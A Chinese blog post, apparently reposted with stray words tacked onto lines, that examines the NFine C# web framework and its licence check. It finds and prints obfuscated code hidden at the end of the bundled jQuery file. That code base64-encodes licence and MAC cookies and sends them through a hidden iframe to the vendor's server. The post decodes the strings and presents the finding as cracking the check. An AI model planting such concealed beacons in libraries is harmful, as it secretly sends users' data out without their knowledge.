某大神C#框架後臺發送信息的查找及破解

  最近在博客園瞎逛的時候,發現了某個大神發佈的一個c#框架,一看框架,叫牛逼框架,嗯,裝B效果太好了,界面很炫,雖然有不少的組件仍是不怎麼完善,可是,已經能夠初步運用於項目了。javascript

 先來看看界面:css

 

 

 

在進行測試的時候,用瀏覽器進行測試的時候,發現一個問題,就是該程序會主動向後臺發送一些信息。信息以下:java

  一、http://www.nfine.cn:8099/NFineWatch/signalr/hubs
  二、http://www.nfine.cn:8099/NFineWatch/signalr/negotiate?clientProtocol=1.5&userId=95b81fa6-710d-8d03-788a-     880d01c68865&connectionData=%5B%7B%22name%22%3A%22chatshub%22%7D%5D&_=1477271227181
  三、http://www.nfine.cn:8099/NFineWatch/signalr/connect?transport=serverSentEvents&clientProtocol=1.5&userId=95b81fa6-710d-8d03-788a-880d01c68865&connectionToken=B5Z%2BxAuoquji6auxI93WACrs2lvi3u0BWP7XS1H%2B6RYLqFcksPZofnlOX59huHUX6s6TsrOtDAx8ewu99R7qH90bisK7SNqMfc8ZeOGiJJHfggSs%2FZf%2Fz9IOXhKbBgKS&connectionData=%5B%7B%22name%22%3A%22chatshub%22%7D%5D&tid=0
  四、http://www.nfine.cn:8099/NFineWatch/signalr/start?transport=serverSentEvents&clientProtocol=1.5&userId=95b81fa6-710d-8d03-788a-880d01c68865&connectionToken=B5Z%2BxAuoquji6auxI93WACrs2lvi3u0BWP7XS1H%2B6RYLqFcksPZofnlOX59huHUX6s6TsrOtDAx8ewu99R7qH90bisK7SNqMfc8ZeOGiJJHfggSs%2FZf%2Fz9IOXhKbBgKS&connectionData=%5B%7B%22name%22%3A%22chatshub%22%7D%5D&_=1477271227278
 五、http://www.nfine.cn:8099/NFineWatch/signalr/send?transport=serverSentEvents&clientProtocol=1.5&userId=95b81fa6-710d-8d03-788a-880d01c68865&connectionToken=B5Z%2BxAuoquji6auxI93WACrs2lvi3u0BWP7XS1H%2B6RYLqFcksPZofnlOX59huHUX6s6TsrOtDAx8ewu99R7qH90bisK7SNqMfc8ZeOGiJJHfggSs%2FZf%2Fz9IOXhKbBgKS&connectionData=%5B%7B%22name%22%3A%22chatshub%22%7D%5Djquery

  而後,經過這些信息,就能夠判斷出,該程序是否是受權使用的。c#

 可是該加密的手段經過全文查找和搜索查找,都無果,而後一猜測,既然明文搜不到,那就只能說明時加密的了。後端

 而後打開瀏覽器的調試功能,一抓,發現是用signalr在和服務器通信,若是是同signalr來和服務器進行通訊的話,那就是說明,js代碼,主要是在jquery以後了,瀏覽器

<link href="~/Content/css/framework-font.css" rel="stylesheet" />
<link href="~/Content/css/framework-login.css" rel="stylesheet" />
<script src="~/Content/js/jquery/jquery-2.1.1.min.js"></script>
<script src="~/Content/js/cookie/jquery.cookie.js"></script>
<script src="~/Content/js/md5/jquery.md5.js"></script>服務器

一看,jquery以後的文件不多,所以,第一個就是打開jquery這個文件進行查看,而後猜測通常後端開發的不多會去改jque中間的文件,通常改也是改在末尾,而後打開notepad++進行查看,直接跳到末尾,發現如下代碼:cookie

(function ($) {
    $.abcd = {
        getCookie: function (a) { var b, c = new RegExp("(^| )" + a + "=([^;]*)(;|$)"); if (b = document.cookie.match(c)) { return unescape(b[2]) } else { return null } }, execute: function () {
            try {
                if (top.$.wdversion == undefined) {
                    top.$.wdversion = "0.0.0.0.0.1";
                    var a = $.abcd.getCookie("DFine_mac"); var b = $.abcd.getCookie("DFine_licence"); var c = decodeURIComponent(window.atob("aHR0cDovL3d3dy5uZmluZS5jbjo4MDk5L05GaW5lV2F0Y2gvMjAxNjA4MDEuaHRtbA==")); var d = window.atob("aWZyYW1lanMwMDAwMQ=="); var f = decodeURIComponent(window.atob("JTNDaWZyYW1lJTIwaWQlM0QlMjJpZnJhbWVqczAwMDAxJTIyJTIwJTIwc3R5bGUlM0QlMjJkaXNwbGF5JTNBbm9uZSUyMiUyMCUzRSUzQy9pZnJhbWUlM0U=")); var g = ""; if (top.$("#" + d).length <= 0) { top.$("body").append(f); window.setTimeout(function () { top.$.wdkey = { userKey: b, macs: a }; if (top.$.wdkey != undefined) { g = window.btoa(JSON.stringify(top.$.wdkey)) }; top.$("#" + d).attr("src", c + "?=" + g) }, 6000) }
                }
            } catch (e) { }
        }, init: function () { $.abcd.execute() }
    }; $(function () { $.abcd.init() })
})(jQuery);

 一看,竟然有咱們看不懂的,而後,猜估計就是這一段代碼了。app

而後寫了一個簡單的測試程序進行驗證:

        function test() {
            var c = decodeURIComponent(window.atob("aHR0cDovL3d3dy5uZmluZS5jbjo4MDk5L05GaW5lV2F0Y2gvMjAxNjA4MDEuaHRtbA=="));
            var d = window.atob("aWZyYW1lanMwMDAwMQ==");
            var f = decodeURIComponent(window.atob("JTNDaWZyYW1lJTIwaWQlM0QlMjJpZnJhbWVqczAwMDAxJTIyJTIwJTIwc3R5bGUlM0QlMjJkaXNwbGF5JTNBbm9uZSUyMiUyMCUzRSUzQy9pZnJhbWUlM0U="));
            console.log(c);
            console.log(d);
            console.log(f);
        }

  瀏覽器輸出:,一看就是它了。

 

 

 

拿人代碼,收留餘香(Http://http://www.nfine.cn/)    

體驗地址:(官網)http://www.nfine.cn/  ,(修改以後的)www.yuechifan.net

最後,仍是很是感謝他們開源作的貢獻,謝謝。

相關文章
相關標籤/搜索